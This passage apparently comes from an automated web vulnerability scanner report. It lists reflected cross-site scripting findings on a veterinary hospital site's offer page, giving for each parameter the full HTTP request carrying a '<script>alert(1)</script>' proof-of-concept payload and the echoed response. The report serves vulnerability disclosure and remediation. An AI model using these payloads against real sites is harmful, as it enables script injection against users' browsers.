GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-841661e9e"><script>alert(1)</script>8361d0a233a&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:23 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hg9evj4m1q5qnnnvp8ppo8c1g0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-841661e9e"><script>alert(1)</script>8361d0a233a&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.2
...[SNIP]...

2.45. http://www.vcahospitals.com/main/offer [uri parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 922c0"><script>alert(1)</script>c8ab77b4859 was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d922c0"><script>alert(1)</script>c8ab77b4859&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:28 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=vrccil3nvdrv3u04cdk943phe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
52bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d922c0"><script>alert(1)</script>c8ab77b4859&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.46. http://www.vcahospitals.com/main/offer [useragent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccc8"><script>alert(1)</script>dd190c671a2 was submitted in the useragent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)9ccc8"><script>alert(1)</script>dd190c671a2&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=icsbsqp3afi5ar05hms93sc531; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)9ccc8"><script>alert(1)</script>dd190c671a2&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.47. http://www.vcahospitals.com/main/offer [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f65b"><script>alert(1)</script>14ab4538db8 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded1f65b"><script>alert(1)</script>14ab4538db8&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=0mlrillum4vu8mp1o97hfbr3r3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded1f65b"><script>alert(1)</script>14ab4538db8&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.48. http://www.vcahospitals.com/main/offer [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b9c"><script>alert(1)</script>72b305046a9 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc79b9c"><script>alert(1)</script>72b305046a9&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=baenvd1f3pb9gev61jv8jo9f25; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc79b9c"><script>alert(1)</script>72b305046a9&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.49. http://www.vcahospitals.com/main/offer [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcfe2"><script>alert(1)</script>09d0de21174 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=googlebcfe2"><script>alert(1)</script>09d0de21174&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t86j051ojsn7hfvp5cju39eml7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=googlebcfe2"><script>alert(1)</script>09d0de21174&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.50. http://www.vcahospitals.com/main/offer [utm_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec13"><script>alert(1)</script>22dd34fcafe was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antechcec13"><script>alert(1)</script>22dd34fcafe&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:26 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ul77dhjfgbf0ges117v5r933n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antechcec13"><script>alert(1)</script>22dd34fcafe&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.51. http://www.vcahospitals.com/main/offer [variant parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the variant request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83dad"><script>alert(1)</script>b2542e55643 was submitted in the variant parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a